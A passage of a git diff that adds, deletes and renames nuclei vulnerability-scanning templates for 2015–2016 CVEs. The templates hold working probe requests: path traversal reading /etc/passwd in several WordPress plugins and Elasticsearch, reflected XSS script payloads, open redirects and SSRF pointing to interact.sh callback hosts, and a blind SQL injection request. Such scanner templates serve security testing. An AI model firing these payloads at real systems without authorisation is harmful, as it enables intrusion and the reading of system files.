4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-4668.yaml b/nuclei-templates/CVE-2015/cve-2015-4668.yaml new file mode 100644 index 0000000000..cb04dbfe5c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4668.yaml @@ -0,0 +1,43 @@ +id: CVE-2015-4668 + +info: + name: Xsuite <=2.4.4.5 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. + reference: + - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt + - https://vuldb.com/?id.107082 + - https://www.exploit-db.com/exploits/37708/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-4668 + cwe-id: CWE-601 + epss-score: 0.00397 + epss-percentile: 0.73024 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xceedium + product: xsuite + tags: cve2015,cve,redirect,xsuite,xceedium,edb + +http: + - method: GET + path: + - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-4694.yaml b/nuclei-templates/CVE-2015/cve-2015-4694.yaml new file mode 100644 index 0000000000..97b8256f1d --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4694.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-4694 + +info: + name: Zip Attachments <= 1.1.4 - Arbitrary File Download + author: 0x_Akoko + severity: high + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + reference: https://wpscan.com/vulnerability/8047 + tags: lfi,wordpress,cve,cve2015,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2015-4694 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-5354.yaml b/nuclei-templates/CVE-2015/cve-2015-5354.yaml deleted file mode 100644 index 387ce0d925..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5354.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2015-5354 - -info: - name: Novius OS 5.0.1-elche - Open Redirect - author: 0x_Akoko - severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. - remediation: | - Apply the latest security patches or upgrade to a newer version of Novius OS. - reference: - - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://vuldb.com/?id.76181 - - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 - - https://www.exploit-db.com/exploits/37439/ - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N - cvss-score: 5.8 - cve-id: CVE-2015-5354 - cwe-id: CWE-601 - epss-score: 0.00166 - epss-percentile: 0.53247 - cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: novius-os - product: novius_os - tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss - -http: - - method: GET - path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-5461.yaml b/nuclei-templates/CVE-2015/cve-2015-5461.yaml deleted file mode 100644 index e5416a7c9e..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5461.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: CVE-2015-5461 - -info: - name: StageShow <= 5.0.8 - Open Redirect - author: 0x_Akoko - severity: medium - description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. - reference: - - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 - tags: redirect,cve,cve2015,wordpress,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2015/cve-2015-5531.yaml b/nuclei-templates/CVE-2015/cve-2015-5531.yaml deleted file mode 100644 index de74ca8495..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5531.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2015-5531 -info: - name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) - author: princechaddha - severity: high - description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. - reference: - - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - tags: cve,cve2015,elasticsearch - -requests: - - raw: - - | - PUT /_snapshot/test HTTP/1.1 - Host: {{Hostname}} - - { - "type": "fs", - "settings": { - "location": "/usr/share/elasticsearch/repo/test" - } - } - - - | - PUT /_snapshot/test2 HTTP/1.1 - Host: {{Hostname}} - - { - "type": "fs", - "settings": { - "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" - } - } - - - | - GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ElasticsearchParseException' - - 'Failed to derive xcontent from' - - '114, 111, 111, 116, 58' - condition: and - - - type: status - status: - - 400 diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml deleted file mode 100644 index 23b0e18646..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-6544.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-6544 - -info: - name: iTop XSS - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - tags: cve,cve2015,xss,itop - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/cve-2015-8813.yaml new file mode 100644 index 0000000000..cfc4cd20e0 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-8813.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-8813 + +info: + name: Umbraco SSRF Vulnerability in Feedproxy.aspx + author: emadshanab + severity: high + description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server + reference: + - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 + tags: cve,cve2015,ssrf,oast,umbraco + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2015/cve-2015-9480.yaml b/nuclei-templates/CVE-2015/cve-2015-9480.yaml deleted file mode 100644 index aff9aca94d..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-9480.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-9480 - -info: - name: WordPress Plugin RobotCPA 5 - Directory Traversal - author: daffainfo - severity: high - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - - https://www.exploit-db.com/exploits/37252 - tags: cve,cve2015,wordpress,wp-plugin,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2015-9480 - cwe-id: CWE-22 - description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml new file mode 100644 index 0000000000..e2b9a6d7ed --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000126 + +info: + name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin admin-font-editor v1.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - http://www.securityfocus.com/bid/93896 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml new file mode 100644 index 0000000000..4259ca9297 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 + - https://wordpress.org/plugins/ajax-random-post + - http://www.securityfocus.com/bid/93895 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml deleted file mode 100644 index b824ab00f2..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2016-1000128 - -info: - name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - - https://wordpress.org/plugins/anti-plagiarism - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000128 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..14269d707f --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 + - https://wordpress.org/plugins/e-search + - http://www.securityfocus.com/bid/93867 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml deleted file mode 100644 index 154c2e4ebc..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000133 - -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://www.securityfocus.com/bid/93869 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000134.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000134.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000134.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000135.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000135.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000135.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000135.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml deleted file mode 100644 index 559d5ca9f7..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2016-1000137 - -info: - name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - - https://wordpress.org/plugins/hero-maps-pro - - http://www.securityfocus.com/bid/93815 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000137 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,maps - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml deleted file mode 100644 index c07e1ac6b3..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2016-1000139 - -info: - name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin infusionsoft v1.5.11 - reference: - - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - - https://wordpress.org/plugins/infusionsoft - - http://www.vapidlabs.com/wp/wp_advisory.php?v=864 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000139 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" - - matchers-condition: and - matchers: - - type: word - words: - - '"><"' - - 'input type="text" name="ContactId"' - condition: and - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000140.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000140.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000140.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000140.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000143.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000143.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000143.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000146.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000146.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000146.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000146.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml deleted file mode 100644 index a397d31ae5..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000148 - -info: - name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin s3-video v0.983 - reference: - - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - - https://wordpress.org/plugins/s3-video - - http://www.vapidlabs.com/wp/wp_advisory.php?v=240 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000148 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" - - matchers-condition: and - matchers: - - type: word - words: - - '<"' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml index f55daff95d..7998ec03d5 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml @@ -4,18 +4,14 @@ info: name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - - https://wordpress.org/plugins/simpel-reserveren - - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://www.securityfocus.com/bid/93582 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/nuclei-templates/CVE-2016/cve-2016-1000153.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000153.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000153.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000153.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml deleted file mode 100644 index 61d316c74a..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-1000155 -info: - name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 - - https://wordpress.org/plugins/wpsolr-search-engine - - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - http://www.securityfocus.com/bid/93536 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000155 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10940.yaml b/nuclei-templates/CVE-2016/CVE-2016-10940.yaml new file mode 100644 index 0000000000..3898a7c31a --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10940.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10940 + +info: + name: WordPress zm-gallery plugin 1.0 SQL Injection + author: cckuailong,daffainfo + severity: high + description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + reference: + - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 + - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 + - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2016-10940 + cwe-id: CWE-89 + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' + - 'contains(body_2, "[zm_gallery id=")' + - 'contains(body_2, "")' + - '!contains(body_3, "")' + condition: and + +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10956.yaml b/nuclei-templates/CVE-2016/CVE-2016-10956.yaml new file mode 100644 index 0000000000..25c5fdb2e7 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10956.yaml @@ -0,0 +1,34 @@ +id: CVE-2016-10956 + +info: + name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo,0x240x23elu + severity: high + description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. + reference: + - https://cxsecurity.com/issue/WLB-2016080220 + - https://wpvulndb.com/vulnerabilities/8609 + - https://wordpress.org/plugins/mail-masta/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2016-10956 + cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,lfi,mail + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + - 500 diff --git a/nuclei-templates/CVE-2016/cve-2016-10960.yaml b/nuclei-templates/CVE-2016/CVE-2016-10960.yaml similarity index 100% rename from 